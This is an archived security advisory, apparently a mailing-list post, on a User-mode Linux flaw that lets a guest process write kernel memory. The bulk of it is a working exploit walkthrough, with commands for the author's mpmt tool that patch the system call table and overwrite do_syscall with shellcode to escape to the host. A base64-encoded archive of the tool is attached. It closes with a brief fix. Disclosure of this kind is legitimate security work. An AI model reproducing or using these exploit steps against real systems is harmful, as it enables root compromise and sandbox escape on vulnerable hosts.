|
COMMAND User-mode-linux root compromise SYSTEMS AFFECTED UML patch-2.4.17-8 and previous versions PROBLEM Andrew Griffiths reported : A user proccess can write into kernel memory, which will allow a person to get root inside the uml \"box\", and the possibility to break out of the uml \"box\", into the real one. This can happen even if the jail and honeypot options are turned on. [ Though I suspect the version i was testing was half-way through implementing them ] Some effects can happen, such as causing the uml processes to die, and making a process chew up heaps of cpu time indefinately. I used the small debian 2.2 root fs to play around with, on a host kernel of 2.4.17ctx-5 (vserver context security patch). To start it up I used: [andrewg@blackhole linux]$ ./linux ubd0=debcow,root_fs_debian2.2_small jail=1 honeypot=1 jail honeypot Exploit : ======= There is no exploit as such yet, just a tool to help you exploit it. For the commands you don\'t specify the offset for sys_call_table, it uses the built in one at 0xa019f650. [ Which is nolonger valid for my ./linux, and most likely not for your system. ] [andrewg@blackhole mpmt]$ ./mpmt -h ./mpmt: invalid option -- h [ Hey, I said it wasn\'t finished. ] Multi-Purpose Modification Tool v0.6 by Andrew Griffiths ./mpmt -1 [ -2 ] [ -o ] [ -p | -f | -s ] [ -r ] ./mpmt -o 0xa020ee1f -p -1 61 Would print out the offset of chroot at the sys_call_table location of 0xa020ee1f ./mpmt -1 23 -2 36 Would replace setuid()\'s location in sys_call_table with sync()s function. ./mpmt -1 23 -2 36 -r Would replace setuid()\'s location in sys_call_table with sync()s function, and restore it back to it would in n seconds. (time default is 30 seconds) For values of these numbers, look in /usr/include/asm/unistd.h Also, you can do abiratory read and writes on kernel memory, with the -a for the address, -c for how much to copy, -R to read, and -W to write and -F to specify file. To do things like play around with the sys_call_table, you\'ll need the address of it. To get it, just do: [andrewg@blackhole linux]$ nm -a linux | grep sys_call_table a01bb744 D sys_call_table 00000000 a sys_call_table.c [andrewg@blackhole linux]$ and the first address is the sys_call_table. I haven\'t looked into determining the sys_call_table address while you\'re in it. I suspect it could be done by looking at the kernel memory (which is an elf file), and finding the address via the global offset table, or something. If it isn\'t stripped, you should be laughing. Once you can work these out, you should be able to write a version independant exploit. To get a copy of the first 256 bytes of the sys_call_table struct, and to dump it into systable: andrewg@usermode:~$ ./mpmt -a 0xa01bb744 -c 256 -R -F systable To get the first 2048 bytes of setuid so you can backdoor it: andrewg@usermode:~$ ./mpmt -o 0xa01bb744 -p -1 23 Location in memory where function 23 is 0xa0018024 andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -R andrewg@usermode:~$ [ Now run ndisasm and patch and then run... ] andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -W The sharp reader will have already noticed that we could replace the getuid with a harmless syscall such as sync, and then call su || su -c \"shell script\" to do what we want. However, on my system, there\'s a couple of problems, like it starting of way too many su proccess\'s or them dying straight away. However the -c one seems to work... And now for the ultimate exploit against User-mode-linux: Breaking out of it. To break out of uml, you need to cause the tracer program to execute code of your choosing. [ No shit!?! Thats because the tracer pid isn\'t running being ptraced itself. Sidenote: If you could kill the tracer, you might be able to execute cide... ] We can accomplice this by writing into certain areas of memory... The function I have choose to target is do_syscall. Now, for the exploitation: [andrewg@blackhole andrewg]$ nm -a /usr/src/linux/linux | grep do_syscall a01000f0 T do_syscall [andrewg@blackhole andrewg]$ cat /tmp/sh <<_EOF_ #!/bin/sh echo OWNED > /tmp/umlisbroken _EOF_ [andrewg@blackhole andrewg]$ chmod +x /tmp/sh And now for the usermode linux part, where ex is just a program that spits out standard Aleph1 (Phrack 49) shellcode. andrewg@usermode:~$ ./ex | sed s/bin/tmp/ > exploit_code andrewg@usermode:~$ ./mpmt -a 0xa01000f0 -c 43 -W -F exploit_code At this point, the screen where you started UML, is probably a message like: Kernel panic: Error mapping a page - errno = 9 [ Bad File descriptor ] I suspect its trying to mmap() a page from somewhere with a fd that isn\'t valid for the real kernel. (Cause it\'s no longer being ptrace()d.) And now [Drum roll please] [andrewg@blackhole andrewg]$ cat /tmp/umlisbroken OWNED [andrewg@blackhole andrewg]$ You may be asking why the shellcode doesn\'t do anything more interesting than exec()ing /tmp/sh, well, you gotta remember this is for \"proof of concept\"... Don\'t forget to do a \"killall -9 linux\" and restart it, cause you\'ve just killed it.... --VisualMail-05100281 Content-type: application/octet-stream; name=\"mpmt.tgz\" Content-transfer-encoding: base64 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 TR/j9D941SkoAHgAAA== --VisualMail-05100281-- SOLUTION To prevent some of the problems, I suggest running the uml in a chroot()ed enviroment, with memory and cpu restrictions turned on. Get version patch-2.4.17-9